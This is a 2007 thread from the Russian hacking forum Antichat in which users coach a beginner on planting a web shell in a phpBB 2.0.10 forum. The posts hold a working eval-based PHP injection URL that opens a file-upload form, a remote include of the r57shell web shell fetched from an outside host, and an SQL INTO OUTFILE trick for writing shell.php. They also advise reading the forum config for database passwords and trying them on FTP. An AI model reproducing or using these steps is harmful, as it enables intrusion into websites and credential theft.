Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Заливка шелла в phpBB 2.0.10 (https://forum.antichat.xyz/showthread.php?t=35574)

SSSetuPPP 15.03.2007 15:35
Заливка шелла в phpBB 2.0.10
 
Форум - phpBB 2.0.10
Есть доступ к админке.
Не получается залить шелл ни через уязвимость highlight, ни через стили, ни через профайл, ни через заливку sql (восстановление БД).
Попробовал через загрузку аватары - пишет, что максимальный размер 9 кб. Такая же история (про аватару) через багу ShanKaR'а.:(
Посоветуйте что-нибудь, plizzzzzzzz !!!

Ща поковырялся и получилось c помощью видео ShAnKaR'а вставить в профиль функию phpinfo().
А bandera объяснял о функции - a:include($_GET[w])
Цитата:
http://forum.antichat.ru/thread24488.html
Я делал всё так и ничего не происходит.:(
Почему?

n1†R0x 15.03.2007 15:56
мм а с аватарой проблему не решить путем увеличения лимита загружаемого файла? или о_0 это в админке не редактируется?

мм хотя мб там фильтрация стоит, но все же проверь..

ice1k 15.03.2007 15:58
Цитата:
Сообщение от n1†R0x
мм а с аватарой проблему не решить путем увеличения лимита загружаемого файла? или о_0 это в админке не редактируется?

мм хотя мб там фильтрация стоит, но все же проверь..
а что 9Кб это разве много по сути? ;)

†Nood1e† 15.03.2007 16:05
увеличь размер загрузки аватарки через админку и загруси туды шелл!

n1†R0x 15.03.2007 16:16
Цитата:
Сообщение от ice1k
а что 9Кб это разве много по сути? ;)
немного)
но раз у ТСа не вышло, значит у него шелл >9kb :logika: :D

ShAnKaR 15.03.2007 20:39
Цитата:
Сообщение от SSSetuPPP
А bandera объяснял о функции - a:include($_GET[w])

Я делал всё так и ничего не происходит.:(
Почему?
ну инклуде http не всегда работает в силу нескоьких причин , поэтому чтобы проверить что происходит ли вобще php injection тестим на phpinfo() например, а вобще можно и без include обойтись, например с помощью eval($_GET[q]):

http://forum.com/profile.php?q=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@co py($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>
:)

SSSetuPPP 16.03.2007 13:10
Ответ...
 
Цитата:
Сообщение от GrAmOzEkA
А чем это не нравится? Просто создаёш файл 1.sql с содержимым ниже и импортируеш:


А потом просто инклудиш: www.test2.ru/phpbb/images/avatars/shell.php?inc=http://inferno23x.jino-net.ru/shells/r57shell.txt
Вот, что получается:

Цитата:
Error importing backup file

DEBUG MODE

SQL Error : 1045 Access denied for user 'user'@'localhost' (using password: YES)

SELECT cat_title INTO OUTFILE '/путь до папки forum/images/avatars/shell.php' FROM phpbb_categories where cat_id=99999

Line : 980
File : /путь до папки forum/admin/admin_db_utilities.php
Цитата:
Сообщение от ShAnKaR
ну инклуде http не всегда работает в силу нескоьких причин , поэтому чтобы проверить что происходит ли вобще php injection тестим на phpinfo() например, а вобще можно и без include обойтись, например с помощью eval($_GET[q]):

http://forum.com/profile.php?q=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@co py($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>
:)
Я новичок, и не совсем понимаю.... Объясни пожалуйста пошагово....

Цитата:
Сообщение от n1†R0x
мм а с аватарой проблему не решить путем увеличения лимита загружаемого файла? или о_0 это в админке не редактируется?

мм хотя мб там фильтрация стоит, но все же проверь..
Увеличил я размер загружаемой аватары и сделал как описывал k1b0rg в статье:
Цитата:
http://forum.antichat.ru/thread32782.html
И всё равно ничего не вышло...:(

Пишет:
Цитата:
Файл аватары должен быть .jpg, .gif или .png
, хотя я и переименовывал в jpg, gif.

ShAnKaR 16.03.2007 18:41
Цитата:
Сообщение от GrAmOzEkA
Ищи путь до какойнибудь расширенной папки не обязательно она может быть в дире с форумом. И ещё подредактируй файл 1.sql
фигню пишешь дружище :) ты сам то пробовал только на своем компе небось?

меня слушай автор топика

SSSetuPPP 25.03.2007 17:45
Не понял...
 
Цитата:
Сообщение от ShAnKaR
фигню пишешь дружище :) ты сам то пробовал только на своем компе небось?

меня слушай автор топика
ShAnKaR, объясни пожалуйста пошагово...

ShAnKaR 26.03.2007 00:18
Цитата:
Сообщение от SSSetuPPP
ShAnKaR, объясни пожалуйста пошагово...
кароче
Цитата:
Ща поковырялся и получилось c помощью видео ShAnKaR'а вставить в профиль функию phpinfo().
А bandera объяснял о функции - a:include($_GET[w])
вот вместо a:include($_GET[w])
ставишь a:eval($_GET[w])
потом идешь как и в случае с include по адресу
/profile.php?mode=editprofile&w=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@co py($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>
если все ok появляется формочка для заливки файла , и тут уже можешь залить все что надо, залитое сохраняется в корневой папке форума в данном случае, это самый простой способ я думаю , но можно например воспользоватся другими функциями php например fopen,fwrite и тп для создания файла.
можно так же если не получится залить файл в папку с форумом залить в /tmp, а потом проинклудить его из /tmp.
если вобще ни куда не получится залить, можно посмотреть конфиг форума с пасом от бд и попробовать пасы на ftp например.


Время: 18:36